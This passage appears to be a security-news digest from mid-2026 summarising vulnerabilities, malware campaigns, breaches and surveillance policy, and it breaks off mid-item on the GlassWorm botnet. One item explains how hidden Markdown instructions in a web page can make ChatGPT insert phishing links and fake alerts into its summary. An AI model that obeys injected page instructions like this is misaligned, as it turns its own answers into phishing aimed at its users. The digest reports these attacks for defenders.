Palo Alto Networks says attackers are now using a GlobalProtect VPN flaw to try to get into corporate networks without valid credentials. The issue, CVE-2026-0257, affects PAN-OS GlobalProtect portal and gateway configurations that use authentication override cookies with specific certificate reuse; attackers can forge those cookies and establish unauthorized VPN access on unpatched devices. Rapid7 says it saw exploitation from at least May 17, 2026, and CISA has added the flaw to its Known Exploited Vulnerabilities catalog.
Why it matters: Organizations that use Palo Alto GlobalProtect could be exposed to unauthorized remote access into internal networks, so this is an urgent patch-now issue. Defenders should update PAN-OS immediately and, if needed, disable authentication override cookies or use a separate certificate for that feature.
Sources
2026.06.01 98%
This article is the same underlying event and adds specifics that Rapid7 observed successful exploitation in multiple customer environments as early as May 17, saw attackers establish unauthorized VPN sessions, and notes the flaw has been added to CISA's KEV catalog with a federal patch deadline.
Ionut Arghire 2026.06.01 97%
This directly updates the same CVE-2026-0257 event by adding that exploitation began on May 17, four days after disclosure; describing Rapid7's observed waves from Vultr and Dromatics Systems; noting forged-cookie abuse and partial VPN session establishment; and pointing defenders to Rapid7's PoC scanner and indicators of compromise.
Lawrence Abrams 2026.05.30 100%
This article establishes a new tracked event by confirming active exploitation of Palo Alto PAN-OS GlobalProtect CVE-2026-0257 and linking it to urgent mitigation and KEV listing.
Full page
CIFSwitch Linux kernel flaw can let local users gain root on multiple distributions
Zero-Days & CVEs, Technology & Software, Consumers & General Public
A newly disclosed Linux flaw called CIFSwitch can let a normal local user take full control of an affected system. The bug is a local privilege-escalation issue in the Linux kernel CIFS subsystem and cifs-utils, where forged cifs.spnego key requests can make the root-run cifs.upcall helper trust attacker-controlled data and load a malicious NSS module. The researcher says vulnerable combinations affect multiple distributions, has published a proof-of-concept exploit, and points to upstream fix commit 3da1fdf.
Why it matters: This matters for multi-user Linux systems and enterprise fleets because a user or attacker who already has limited access may be able to become root. Organizations should identify affected distributions, apply vendor kernel updates, and consider mitigations such as disabling unprivileged user namespaces or removing unused CIFS components.
Sources
Ionut Arghire 2026.06.01 96%
This article is a direct update on the same CIFSwitch Linux kernel privilege-escalation flaw, adding that PoC exploit code has now been released and summarizing affected and non-affected distributions plus the root cause involving the CIFS subsystem and cifs.upcall.
Bill Toulas 2026.05.30 100%
This article appears to establish a new tracked event: the public disclosure of the CIFSwitch Linux privilege-escalation flaw, including affected distributions, mitigation guidance, and a released proof-of-concept.
Full page
UK moves to tighten subsea cable protections after reporting Russian survey activity near British undersea internet infrastructure
Information Freedom, Policy & Regulation, Government, Defense & Aerospace, Telecommunications, UK government, Royal Navy, GUGI
The UK says Russian vessels and submarines recently surveyed cable routes near Britain, and the government is preparing stronger legal protections for undersea internet cables. The reported April activity involved a Russian Akula-class submarine and two specialist GUGI deep-sea research vessels, according to the minister's speech. Proposed measures include tougher penalties for reckless cable damage, new security duties for cable operators, and emergency powers allowing the government to compel stronger infrastructure protection.
Why it matters: Subsea cables carry much of the UK's internet and international communications, so interference could disrupt connectivity and critical services. This matters to telecom operators, infrastructure owners, and policymakers because it signals a live hybrid-threat risk and points to forthcoming compliance and resilience requirements.
Sources
2026.06.01 100%
This article establishes a distinct story about suspected Russian reconnaissance of UK subsea communications infrastructure and the UK's resulting legal and operational push to protect cable networks.
Full page
Kaspersky says previously unknown hacking group spent nearly two years phishing Russian maritime universities, diplomats and energy organizations
Threat Actors & APTs, Social Engineering & Phishing, Education, Government, Energy & Utilities, Finance & Banking, Transportation & Logistics
A previously unknown hacking group quietly targeted Russian maritime schools, diplomatic missions, energy facilities, government agencies and financial institutions for nearly two years. Kaspersky says the campaign dates back to at least 2024 and used phishing emails with ZIP attachments containing a malicious file disguised as a Microsoft Excel configuration file; recent attacks starting in January 2026 used the Ravage post-compromise framework from GitHub to run commands, move files and capture screenshots. The company did not name the group, provide victim totals, or attribute the activity to a known state or criminal actor.
Why it matters: This is a sustained espionage-style campaign against sensitive Russian sectors, showing that simple phishing attachments are still effective and that publicly available offensive tools are being folded into real operations. Organizations in similar sectors should review email defenses, hunt for Ravage-related activity, and investigate suspicious Excel-launched processes and dormant compromises.
Sources
2026.05.31 100%
This article appears to be the first tracked report establishing this specific, previously unreported multi-year campaign and its targeting pattern.
Full page
Suspected Pakistan-linked SideCopy phishing campaign targets Afghanistan finance officials with XenoRAT malware
Threat Actors & APTs, Social Engineering & Phishing, Malware, Government, Finance & Banking, Afghan Ministry of Finance
Afghan Ministry of Finance and provincial government officials were targeted in a phishing campaign that installed remote-access malware on victims' computers. Seqrite attributed the activity with medium-to-high confidence to the Pakistan-linked SideCopy group, which used Pashto-language lure documents inside ZIP archives and delivered them through compromised Afghan government server infrastructure; opening the file installed XenoRAT, a remote access trojan, which then contacted attacker-controlled servers in Europe.
Why it matters: This matters because it shows a suspected state-linked espionage operation aimed at government financial and provincial officials, using trusted local-language lures and compromised government infrastructure to improve success. Afghan public-sector defenders should investigate suspicious ZIP attachments, review access to government-hosted domains, and hunt for XenoRAT-related activity.
Sources
2026.05.31 100%
This article establishes a distinct campaign: a newly reported suspected SideCopy operation targeting Afghan finance-sector government entities via Pashto-language phishing and XenoRAT.
Full page
European intelligence officials warn Russia is intensifying espionage and cyber intrusions to steal sanctioned Western technology
Threat Actors & APTs, Policy & Regulation, Government, Defense & Aerospace, Energy & Utilities, Technology & Software, Manufacturing
European intelligence officials say Russia is increasingly using fake companies, middlemen, and cyber operations to steal Western technology, defense know-how, and software restricted by sanctions. The reported targets include defense research, dual-use camera and laser technology, machine-tool software updates, and critical infrastructure reconnaissance in Sweden, Finland, and the U.K. Officials also said Russia-linked actors attempted a destructive intrusion against a Swedish power plant last year but were detected before causing damage.
Why it matters: This matters to companies in defense, manufacturing, research, and critical infrastructure because they may be targeted both for theft and for pre-attack reconnaissance. Organizations should scrutinize customers and intermediaries for sanctions evasion, harden networks used for industrial systems, and watch for state-linked phishing, intrusion, and supply-chain targeting.
Sources
Associated Press 2026.05.30 100%
This article establishes a distinct story by tying sanctions pressure to a broader, ongoing Russian espionage and cyber campaign against Western technology suppliers and infrastructure, rather than reporting on a single previously tracked breach or malware incident.
Full page
Exploit code published for Flowise remote-code-execution flaw CVE-2026-40933 affecting self-hosted servers
Zero-Days & CVEs, Technology & Software, Flowise
Public exploit code is now available for a critical Flowise bug that can let attackers take over self-hosted AI workflow servers by getting someone to import a malicious chatflow. The flaw, CVE-2026-40933 (CVSS 9.9), affects Flowise before 3.1.0 and stems from unsafe handling of Anthropic Model Context Protocol (MCP) stdio commands in the MCP adapter. Importing a crafted chatflow can trigger command execution during tool enumeration, leading to operating-system-level code execution with the Flowise process's privileges. Flowise Cloud is not affected because stdio MCP is disabled there.
Why it matters: Organizations running self-hosted Flowise should treat this as urgent because working exploit code lowers the barrier to real attacks and the flaw can expose stored credentials and connected services. Update to 3.1.0 or later and limit who can create or import chatflows, especially where Flowise is connected to databases, APIs, or cloud accounts.
Sources
Ionut Arghire 2026.05.30 100%
This article establishes a distinct escalation in the Flowise CVE-2026-40933 story by reporting that technical details and proof-of-concept code have been published, making the exploit path concrete and actionable for defenders.
Full page
Microsoft says 14 malicious npm packages impersonated OpenSearch and Elasticsearch libraries to steal cloud and CI/CD credentials
Supply Chain, Malware, Technology & Software, OpenSearch, Elasticsearch, GitHub, HashiCorp, npm
A single attacker published 14 malicious npm packages that pretended to be OpenSearch, Elasticsearch, and related developer tools, putting developers and build systems at risk of secret theft. Microsoft said the packages were uploaded under the alias "vpmdhaj" and used typosquatting, spoofed metadata, and inflated version numbers; on install, preinstall hooks fetched a second-stage credential harvester targeting Amazon Web Services, HashiCorp Vault, GitHub Actions, and npm tokens. The packages were removed after publication.
Why it matters: Anyone who installed or built these packages may have exposed credentials that can be reused to access cloud accounts, code pipelines, and package publishing systems. Organizations should identify affected installs from May 28 onward, rotate AWS Identity and Access Management or Security Token Service credentials, Vault tokens, npm publish tokens, and GitHub Actions secrets, and review for follow-on compromise.
Sources
2026.05.29 100%
This article establishes a distinct npm package supply-chain incident centered on 14 typosquatted packages targeting OpenSearch and Elasticsearch users, not one of the existing tracked package compromises.
Full page
California AB 1856 advances with open-source exemption but would expand age-check requirements to browsers and websites
Surveillance & PrivacyPolicy & RegulationInformation FreedomCensorshipGovernmentTechnology & SoftwareConsumers & General Public
California lawmakers advanced AB 1856, a bill that would exempt open-source operating systems from parts of the state's age-assurance law but broaden age-checking requirements for many internet services. EFF says the amended bill would still extend the age-bracketing regime created by AB 1043 beyond operating systems and app stores to web browsers and websites, increasing pressure to collect users' age data and potentially affecting anonymity, privacy, and access to lawful speech.
Why it matters: If enacted, the bill could force more online services to ask for and retain age information, creating new privacy and security risks for ordinary users while raising compliance burdens for developers and platforms. People and organizations tracking internet freedom and privacy policy should watch the Senate process closely.
Sources
Molly Buckley 2026.05.29 100%
This article establishes a distinct California policy story centered on AB 1856's legislative advance, its new open-source exemption, and its simultaneous expansion of age-gating obligations to browsers and websites.
Full page
ICE awards Bi2 Technologies $25.1 million contract for 1,570 biometric scanners linked to iris, fingerprint, face, and law-enforcement databases
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareConsumers & General PublicICEBi2 Technologies
U.S. Immigration and Customs Enforcement is expanding field use of biometric scanners that can identify people by iris scans, fingerprints, and facial recognition. Contract records show ICE awarded Bi2 Technologies about $25.1 million for 1,570 mobile and stationary devices and access to Bi2's IRIS system, which searches more than five million booking, arrest, and incarceration records across 47 states, along with driver’s license and license-plate data; the deal follows a smaller 200-device deployment under a 2025 contract.
Why it matters: This matters to immigrants, protesters, and the public because it expands real-world government biometric surveillance at scale, with risks of misidentification, bias, and wider tracking. The concrete implication is policy and oversight scrutiny rather than patching: civil-liberties groups, lawmakers, and affected communities should watch how ICE uses the devices and what databases they query.
Sources
2026.05.29 100%
The article establishes a specific new procurement and deployment event: ICE's large-scale purchase of Bi2 biometric devices and database access, distinct from the existing tracked items about other surveillance programs or court cases.
Full page
Attackers abuse ChatGPT share links and Google ads to deliver malware through fake OpenAI outage pages
MalwareSocial Engineering & PhishingTechnology & SoftwareConsumers & General PublicOpenAIGoogle
Attackers are using legitimate ChatGPT share links to show fake OpenAI outage notices that tell people to download a bogus ChatGPT desktop app. Push Security says the LLMShare campaign buys Google ads for ChatGPT searches, serves the lure from chatgpt.com/s/ pages rendered with custom HTML and CSS inside ChatGPT, then redirects victims to openew[.]app, which offers cloaked Windows and macOS malware downloads; the Windows sample checks whether it is running on a real device or a virtual machine.
Why it matters: This matters because the scam is hosted partly on a real OpenAI domain, making it more convincing to ordinary users and harder for defenders to spot. Users should avoid sponsored results for AI tools and download apps only from the official vendor site or app store, while security teams should monitor for chatgpt.com share-link abuse and block the impersonation domain.
Sources
Lawrence Abrams 2026.05.29 100%
This article establishes a distinct campaign centered on abuse of ChatGPT's share-link feature and Google ads to distribute malware via fake outage pages, not the same underlying event as any tracked story.
Full page
California sues 23andMe over the 2023 breach that exposed genetic and profile data of nearly 7 million people
Policy & RegulationSurveillance & PrivacyBreaches & Data LeaksHealthcareConsumers & General Public23andMeCalifornia Attorney General
California has sued 23andMe, now operating as Chrome Holding Co., alleging the company failed to adequately protect customers’ genetic and account data in the 2023 breach affecting nearly 7 million people. The complaint says attackers used credential stuffing—trying usernames and passwords stolen elsewhere—to access about 14,000 accounts, then scrape broader data through 23andMe’s DNA Relatives features; the state also alleges 23andMe failed to require stronger safeguards such as multifactor authentication, missed warning signs for months, and only acted after stolen data was advertised for sale and ransom demands were made.
Why it matters: This matters because the stolen information included highly sensitive genetic and health-related data, and the lawsuit may shape how companies are expected to protect and handle biometric and genomic records. Affected users should reset reused passwords, enable multifactor authentication where available, and review what personal and relative-sharing data remains in their account.
Sources
Bill Toulas 2026.05.29 98%
This is the same underlying event: California's lawsuit over the 2023 23andMe breach. The article adds details on the complaint's allegations, including failure to defend against credential stuffing, missed intrusion-detection opportunities, a DNA Relatives coding error, and claims that 23andMe misled users before and after the breach.
2026.05.29 98%
This article is the same underlying event: California's lawsuit over 23andMe's 2023 breach. It adds that the suit is now directed at Chrome Holding Co., the post-sale successor to 23andMe, and emphasizes allegations that the company downplayed the breach, failed to implement basic safeguards such as stronger MFA adoption, detected the intrusion only after months, and paid a ransom to the attacker.
Associated Press 2026.05.29 100%
This article establishes a trackable new story because it is not just a recap of the 2023 23andMe breach; it is a concrete state legal action alleging specific security failures, privacy-law violations, and mishandling of genetic data tied to that breach.
Full page
Unsealed court records show DOJ tried and failed to get Don Lemon and Georgia Fort YouTube account data
Information FreedomSurveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareMedia & EntertainmentDOJYouTube
A federal judge twice rejected prosecutors’ attempts to obtain YouTube account records tied to journalists Don Lemon and Georgia Fort, including information about their channels and possible viewers. The warrants were sought in a criminal case related to the journalists’ coverage of a protest at a church in St. Paul, Minnesota. Court records show the judge found the applications lacked probable cause and did not comply with the Privacy Protection Act of 1980, which generally limits search warrants targeting journalists and publishers.
Why it matters: This matters to journalists, sources, and viewers because prosecutors sought not just reporter account data but potentially audience information as well. It is a significant press-freedom and privacy issue, and it adds urgency to scrutiny of DOJ warrant practices and proposed updates to journalist-protection laws.
Sources
Freedom of the Press Foundation 2026.05.29 94%
This newsletter directly references the same newly unsealed court records and adds framing from Freedom of the Press Foundation that the rejected warrant applications targeted journalists Don Lemon and Georgia Fort over protest coverage.
Freedom of the Press Foundation 2026.05.27 100%
This article establishes a distinct new story because it is based on newly unsealed warrant records revealing a specific failed DOJ effort to compel YouTube data from named journalists and their audiences.
Full page
Trump Mobile website reportedly exposed customer records through an unsecured API request
Breaches & Data LeaksSurveillance & PrivacyTelecommunicationsConsumers & General PublicTrump Mobile
A Trump Mobile website flaw reportedly let anyone pull customer order records, exposing personal details of people who preordered the company’s phone service and handset. According to The Register and the finder, a simple HTTP POST request to exposed application programming interface (API) endpoints returned batches of records containing names, postal addresses, email addresses, phone numbers, customer numbers, enrollment IDs, and order-channel details; no CVE is assigned, and the issue was reportedly fixed after disclosure attempts.
Why it matters: Affected customers could face phishing, impersonation, or account-targeted fraud if their contact and order data was exposed. Trump Mobile users should watch for suspicious calls, texts, and emails referencing orders or account setup, while the company should clarify scope and notify affected users if exposure is confirmed.
Sources
SecurityWeek News 2026.05.29 95%
This article adds that Trump Mobile confirmed customer names, addresses, email addresses, phone numbers, and other data were exposed, and said a third-party platform provider was responsible for the exposure.
2026.05.22 100%
This article appears to be the first concrete report of the Trump Mobile customer-data exposure event, including the claimed technical access method, categories of data exposed, and estimated scale.
Full page
Charter confirms breach after ShinyHunters claims it stole customer data through a vishing attack
Social Engineering & PhishingBreaches & Data LeaksScams & FraudThreat Actors & APTsTelecommunicationsTechnology & SoftwareConsumers & General PublicCharter CommunicationsMicrosoftSalesforce
Charter Communications says it suffered a security incident after the ShinyHunters extortion group threatened to leak stolen data. The attackers claim they breached Charter on April 1 by using voice phishing (vishing) to compromise an employee's Microsoft Entra account, then used access to Charter's Salesforce environment to export about 40 million customer records, including names, contact details, plan information, support tickets, and some customer proprietary network information (CPNI); Charter disputes that sensitive personal data or CPNI was exfiltrated.
Why it matters: Charter serves tens of millions of customers, so even partial account and service data exposure could create follow-on phishing, fraud, and impersonation risks. Affected users should watch for targeted calls and emails referencing Spectrum or account details, while defenders should review identity-provider protections, help-desk verification, and Salesforce access logs.
Sources
Ionut Arghire 2026.05.29 98%
This is the same Charter/ShinyHunters breach event and adds that the gang has now published the allegedly stolen data, that Have I Been Pwned found about 4.9 million unique email addresses in the leak, and that the dataset includes names, addresses, phone numbers, and roughly 85,000 employee-linked records. It also includes Charter's statement disputing that CPNI or sensitive personal information was released.
2026.05.29 98%
This is the same Charter/ShinyHunters breach event and updates it with reported public leakage of 4.9 million customer records, Have I Been Pwned ingestion details, and Charter's statement that no sensitive PI or CPNI was exfiltrated.
Sergiu Gatlan 2026.05.29 98%
This is the same underlying Charter/ShinyHunters incident and adds key specifics: Have I Been Pwned says 4.9 million unique accounts were affected, the leaked data included names, email addresses, phone numbers, physical addresses, and about 85,000 employee-directory records with job titles, and the intrusion reportedly began with a vishing attack against an employee's Microsoft Entra account followed by theft from Salesforce.
Lawrence Abrams 2026.05.26 100%
This article appears to be the first tracked item establishing Charter's confirmed breach tied to a ShinyHunters extortion claim and a specific vishing-to-SaaS compromise path.
Full page
Google rolls out Chrome device-bound session protection to block stolen cookie account hijacking
Surveillance & PrivacyTechnology & SoftwareConsumers & General PublicGoogle
Google says Chrome's Device Bound Session Credentials feature is now rolling out broadly for personal Google accounts and Google Workspace users to stop attackers from reusing stolen login cookies. The protection cryptographically binds session cookies to a specific device using hardware-backed keys such as TPM on Windows and Secure Enclave on macOS, making stolen cookies far harder to use for account takeover even after multi-factor authentication. Google says it will be enabled by default for Workspace customers and cannot be turned off by admins.
Why it matters: This matters to anyone using Google accounts because session-cookie theft is a common way infostealer malware and phishing campaigns bypass login protections. Users should still remove malware and harden browsers, but this rollout adds an important default defense against account hijacking.
Sources
Sergiu Gatlan 2026.05.29 100%
The article establishes a new trackable security development: Google's general-availability rollout of Chrome Device Bound Session Credentials as a concrete mitigation against session-cookie theft and account takeover.
Full page
Researcher says ChatGPT web-page summaries can be prompt-injected to show phishing links and fake security alerts
Social Engineering & PhishingTechnology & SoftwareConsumers & General PublicOpenAI
A researcher says ChatGPT can be tricked into turning a malicious web page into a phishing message when a user asks it to summarize that page. Permiso's Andi Ahmeti reported that hidden Markdown instructions in attacker-controlled content can make ChatGPT include fake account alerts, attacker links, or QR codes in its response; OpenAI did not confirm a fix, and no CVE is cited in the report.
Why it matters: People using ChatGPT to summarize websites could be shown convincing phishing prompts in the assistant's own voice, including links or QR codes that bypass normal browser safety habits. Until OpenAI confirms a fix, users and defenders should treat AI-generated summaries of untrusted pages as potentially tainted and avoid clicking embedded links or scanning QR codes.
Sources
2026.05.29 100%
This article appears to be the initial report of a distinct ChatGPT prompt-injection phishing technique affecting browser-rendered external content, and it does not match any existing tracked story.
Full page
WithSecure links new Russia-aligned GreyVibe campaign to phishing and malware attacks on Ukrainian targets
Threat Actors & APTsSocial Engineering & PhishingMalwareGovernmentDefense & AerospaceConsumers & General Public
Researchers say a previously undocumented Russia-linked group called GreyVibe has targeted Ukrainian military, government, civilian, and business organizations since August 2025. WithSecure says the actor used at least six spear-phishing campaigns, fake adult-club websites, Telegram and dating-site lures, and file-sharing links to deliver PhantomRelay and LegionRelay malware on Windows and Fallspy on Android; the report also says the group used ChatGPT, Gemini, Ideogram, and other generative artificial intelligence tools across lure creation, malware development, obfuscation, and post-compromise tooling.
Why it matters: This matters because it describes an active espionage-focused campaign against Ukrainian targets and shows how lower-sophistication operators can use generative artificial intelligence to scale convincing phishing and malware operations. Organizations supporting Ukraine should review indicators, harden email and mobile defenses, and warn users about archive-based lures, fake personas, and links delivered over chat and dating platforms.
Sources
2026.05.29 97%
This article is a direct write-up of the same GREYVIBE campaign, adding detail that the operators used ChatGPT, Gemini, and Ideogram AI across lure creation, malware development, infrastructure setup, obfuscation, and post-compromise work, and noting OPSEC mistakes and design flaws in LegionRelay that exposed backend infrastructure.
Bill Toulas 2026.05.28 98%
This article is a direct update on the same GreyVibe campaign, adding detail that the group used ChatGPT, Gemini, and other AI tools to generate lures and likely assist development of custom obfuscators and malware including LegionRelay, PhantomRelay, and FallSpy, alongside more specifics on attack chains such as PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo.
Kevin Townsend 2026.05.28 100%
This article appears to be the first tracked item here establishing GreyVibe as a distinct Russia-linked campaign and naming its malware families, targeting, and AI-assisted operating methods.
Full page
U.S. man sentenced for selling personal data of 7 million elderly Americans to Jamaican lottery scammers
Scams & FraudBreaches & Data LeaksConsumers & General Public
A North Carolina man was sentenced to prison for selling elderly Americans' personal information to scammers who used it in lottery fraud schemes. Troy Murray pleaded guilty to conspiracy to commit wire fraud and was sentenced to 121 months after prosecutors said he sold at least 22,000 lead lists between 2016 and 2023 containing names, phone numbers, physical addresses, and email addresses of over 7 million seniors; authorities said the scheme generated more than $5.2 million for him and caused over $9.5 million in victim losses.
Why it matters: This matters because it shows how stolen or traded personal data directly fuels large-scale fraud against older adults. People, especially seniors and their families, should be wary of unsolicited calls or messages about prizes or lotteries, and defenders and policymakers can use the case as a concrete indicator of fraud infrastructure and data-broker abuse.
Sources
Sergiu Gatlan 2026.05.29 100%
This article establishes a distinct law-enforcement milestone in a large elder-fraud operation centered on the sale of lead lists to Jamaican lottery scammers, and it does not match any existing tracked story by the same underlying event.
Full page
Google Chrome 148 update fixes 151 browser vulnerabilities, including 22 critical flaws
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicGoogle
Google released a Chrome 148 security update that fixes 151 vulnerabilities, including 22 critical bugs that could help attackers run malicious code through the browser. The most severe issues named are CVE-2026-9872 (out-of-bounds write in GPU), CVE-2026-9873 (use-after-free in Network), CVE-2026-9874 (use-after-free in Dawn), CVE-2026-9875 (out-of-bounds read in WebGL), and CVE-2026-9876 (use-after-free in WebGL). The update is rolling out as 148.0.7778.216/217 for Windows, 148.0.7778.215/216 for macOS, and 148.0.7778.215 for Linux.
Why it matters: Chrome is widely used, so browser flaws with remote-code-execution potential can expose large numbers of people and organizations to drive-by compromise if left unpatched. Users and IT teams should update Chrome promptly across Windows, macOS, and Linux fleets.
Sources
Ionut Arghire 2026.05.29 100%
This article establishes a distinct patch-cycle story centered on Google's Chrome 148 update and the specific set of newly disclosed CVEs it fixes; no existing tracked story covers this same release.
Full page
Pentagon confirms foreign adversaries used commercial smartphone location data to target U.S. troops in the Middle East
Surveillance & PrivacyPolicy & RegulationGovernmentDefense & AerospaceTechnology & SoftwareConsumers & General PublicPentagonDepartment of DefenseU.S. Central Command
The Pentagon says foreign adversaries used commercially available phone-location data to target or surveil U.S. military personnel in active war zones, affecting troops who carried personal or government-issued smartphones. According to DoD responses released by Sen. Ron Wyden, U.S. Central Command received multiple threat reports tied to commercial data-broker purchases sourced from mobile advertising profiles and device ad identifiers; the department said existing guidance to disable geolocation was incomplete, and some DoD-managed phones still allowed ad-targeting data to be exposed.
Why it matters: This is a real-world national security and personal safety risk, not a theoretical privacy problem: location data sold by brokers can expose troop movements and bases. It raises urgency for stricter mobile-device controls, disabling ad IDs and location sharing, and rethinking bring-your-own-device policies in sensitive environments.
Sources
2026.05.28 100%
This article appears to be the first public confirmation, backed by DoD responses to lawmakers, that adversaries exploited commercial geolocation data to target or monitor U.S. troops in theater.
Full page
ESET warns BTMOB Android malware sold as a kit can steal data and remotely control infected phones
MalwareScams & FraudSocial Engineering & PhishingConsumers & General Public
A newly highlighted Android malware family called BTMOB can give criminals broad control over infected phones, including stealing data and taking over the device. ESET says the remote access trojan (RAT) is spread through phishing pages and fake app stores, abuses Android Accessibility Services to gain elevated privileges, and is sold with an APK-building kit that lets buyers customize lures by country and brand. The campaign has mainly been observed in Latin America.
Why it matters: This is more serious than a typical banking trojan because it can turn an Android phone into a remotely controlled spying and theft tool. Android users should avoid app downloads from links in messages or fake stores, and defenders should watch for phishing infrastructure and abuse of Accessibility permissions.
Sources
Bill Toulas 2026.05.28 97%
This is the same underlying ESET-reported BTMOB Android malware story, adding detail that the service includes a builder for custom phishing-themed payloads, is sold via Telegram with subscription pricing, is distributed through fake Google Play pages, and is concentrated in Brazil and Latin America.
Ionut Arghire 2026.05.28 100%
This article appears to be the initial broad reporting on ESET's identification of BTMOB as a distinct Android malware threat sold as a customizable kit and delivered through phishing lures.
Full page
Attackers use FortiClient EMS zero-day CVE-2026-35616 to push infostealer malware to managed devices
Zero-Days & CVEsUrgent PatchesMalwareTechnology & SoftwareFortinet
Attackers are using a critical Fortinet server flaw to send malware to computers managed by FortiClient Endpoint Management Server (EMS). The issue, CVE-2026-35616, is a remote code execution bug in FortiClient EMS that can be exploited without authentication via crafted requests; Fortinet patched it in April after warning it had already been used as a zero-day, and Arctic Wolf now says fresh attacks are abusing EMS scripting workflows to deploy EKZ Infostealer disguised as a Fortinet patch.
Why it matters: This can turn a central management server into a way to infect every device it manages, putting passwords, browser cookies, and other sensitive data at risk. Organizations running FortiClient EMS should patch immediately, check for suspicious PowerShell/script activity, and investigate whether fake update jobs were pushed to endpoints.
Sources
Bill Toulas 2026.05.28 99%
This article is the same underlying event and adds specific tradecraft from Arctic Wolf: attackers abused FortiClient EMS endpoint APIs and VPN scripting workflows to deliver the EKZ infostealer, used fortitray.exe and PowerShell to fetch a fake Fortinet update, and left detectable log artifacts such as 'Certificate not found in request header.'
Ionut Arghire 2026.05.28 100%
This article establishes a distinct story by adding concrete post-patch exploitation details for FortiClient EMS CVE-2026-35616, including the malware payload, delivery method through EMS-managed VPN scripting, and the risk of compromise spreading to all managed endpoints.
Arctic Wolf Labs 2026.05.27 97%
This source directly updates the same event by naming the payload as EKZ Infostealer, describing how it was disguised as a Fortinet patch, explaining abuse of EMS policy and remote access profile changes to run malicious PowerShell across managed endpoints, and providing detection details including EMS log artifacts and Tor-linked follow-on activity.
Arctic Wolf Labs 2026.05.27 99%
This directly updates the same event by adding victim-observed tradecraft: attackers exploited CVE-2026-35616 in FortiClient EMS, modified EMS configuration, and delivered a fake Fortinet patch that installed the EKZ Infostealer on managed endpoints via PowerShell. It also adds detection clues from EMS logs and notes follow-on activity from Tor exit nodes.
Full page
Carnival confirms ShinyHunters-linked data breach affecting nearly 6 million cruise customers
Threat Actors & APTsSocial Engineering & PhishingBreaches & Data LeaksHospitality & TravelConsumers & General PublicCarnivalHolland America
Carnival Corporation says attackers stole customer data after socially engineering an employee and accessing part of its IT systems, affecting 5,995,277 people. The company says the intrusion was identified on April 14, 2026 and data theft was confirmed on April 22; ShinyHunters had claimed the breach in April and said it stole millions of records. Exposed data reportedly includes names, dates of birth, email addresses, gender, location, and loyalty-program details tied to Holland America's Mariner Society.
Why it matters: This is a major consumer data breach involving sensitive personal information that could fuel phishing, impersonation, and account-targeting scams. Affected customers should watch for breach notices, be cautious of unsolicited calls or emails referencing cruises or loyalty programs, and change passwords anywhere they were reused.
Sources
Ionut Arghire 2026.05.28 99%
This is the same underlying Carnival breach: it adds the formal disclosure that 5,995,277 people were affected, says the intrusion was identified April 14 after social engineering compromised an employee account, and specifies categories of stolen personal data and the company's notification and credit-monitoring response.
2026.05.28 99%
This article is the same underlying event: Carnival's confirmation that an April compromise of an employee account led to theft of customer data later claimed by ShinyHunters. It adds that the company says copied data includes names, contact details, dates of birth, driver's license numbers, and passport numbers, and cites the Maine filing showing nearly 6 million affected individuals.
2026.05.28 99%
This article is the same underlying event: Carnival's April 14, 2026 social-engineering breach attributed to ShinyHunters. It adds that Carnival's Maine filing lists just under 6 million affected individuals, confirms stolen data types including names, addresses, email addresses, phone numbers, dates of birth, and state identification numbers, and notes that breach notices and two years of credit monitoring are being sent.
Sergiu Gatlan 2026.05.28 100%
This article appears to be the first concrete confirmation and scope disclosure for Carnival's April 2026 breach, tying the incident to a social-engineering attack and a nearly 6 million-person impact.
Full page
Romanian hacker sentenced in U.S. for selling access to Oregon state government network
Breaches & Data LeaksThreat Actors & APTsGovernmentOregon state governmentU.S. Justice Department
A Romanian hacker was sentenced in the United States for breaking into an Oregon state government office and selling that network access to others. Catalin Dragomir admitted hacking the state office in June 2021, selling access for $3,000 in Bitcoin, and trafficking data from at least 10 other U.S. organizations; the Justice Department said the broader activity caused more than $250,000 in losses. He received a prison sentence of 4 years and 8 months after extradition from Romania.
Why it matters: This is a reminder that stolen network access to government systems is an active criminal market, not just a one-off intrusion. Public agencies and contractors should review identity controls, monitor for unauthorized remote access, and ensure former or unusual accounts and access paths are investigated quickly.
Sources
Sergiu Gatlan 2026.05.28 99%
This article is the same underlying event and adds the sentencing specifics: Catalin Dragomir received 56 months in prison, forfeited about 23 Monero, and prosecutors said he sold access to the Oregon Department of Emergency Management network and nearly a dozen other U.S. victims, causing at least $250,000 in losses.
2026.05.27 99%
This article is the same underlying event and adds the sentencing outcome: Catalin Dragomir received 56 months in prison after pleading guilty to aggravated identity theft and obtaining information from a protected computer for hacking Oregon’s Office of Emergency Management and selling administrative credentials.
Eduard Kovacs 2026.05.27 100%
The article establishes a distinct law-enforcement milestone tied to the compromise and resale of access to an Oregon state network, and it does not match any existing tracked story in the list.
Full page
Gitea CVE-2026-27771 let anyone pull private container images from thousands of self-hosted servers
Zero-Days & CVEsUrgent PatchesSupply ChainTechnology & SoftwareGiteaForgejo
A flaw in Gitea could let outsiders download supposedly private software container images from many self-hosted code servers. NoScope says CVE-2026-27771 is an access-control bug in Gitea’s built-in container registry, also affecting Forgejo, where anonymous Docker/OCI pull requests could retrieve private images; Gitea patched it in version 1.26.2, and Shodan data suggested roughly 31,750 internet-facing instances were likely vulnerable.
Why it matters: Private container images can contain source code, credentials, and details about production systems, so this exposure could hand attackers valuable access and intelligence. Organizations running self-hosted Gitea or Forgejo should update to 1.26.2 immediately or enforce authentication for all content access if possible.
Sources
Ionut Arghire 2026.05.28 100%
This article establishes a new tracked story around CVE-2026-27771, a newly reported Gitea/Forgejo container registry access-control flaw with patch availability and internet-scale exposure.
Full page
CrowdStrike, Google and Shadowserver disrupt GlassWorm botnet targeting Visual Studio, npm, PyPI and GitHub developers
Supply ChainThreat Actors & APTsMalwareTechnology & SoftwareCryptocurrency & BlockchainGoogleMicrosoftGitHubnpmPyPIOpenVSX
Security firms say they disrupted the GlassWorm botnet, a malware operation that infected developers and open source software ecosystems to steal credentials and cryptocurrency wallet data and to give its operators remote access to infected machines. CrowdStrike says GlassWorm spread through trojanized Visual Studio extensions on OpenVSX and later through GitHub and compromised Python projects, while using Solana blockchain transactions, Google Calendar, BitTorrent and VPS-hosted servers as layered command-and-control channels. The malware hid code behind Unicode variation selectors, characters that editors do not render, and stole npm, GitHub and Git credentials, creating downstream software supply-chain risk.
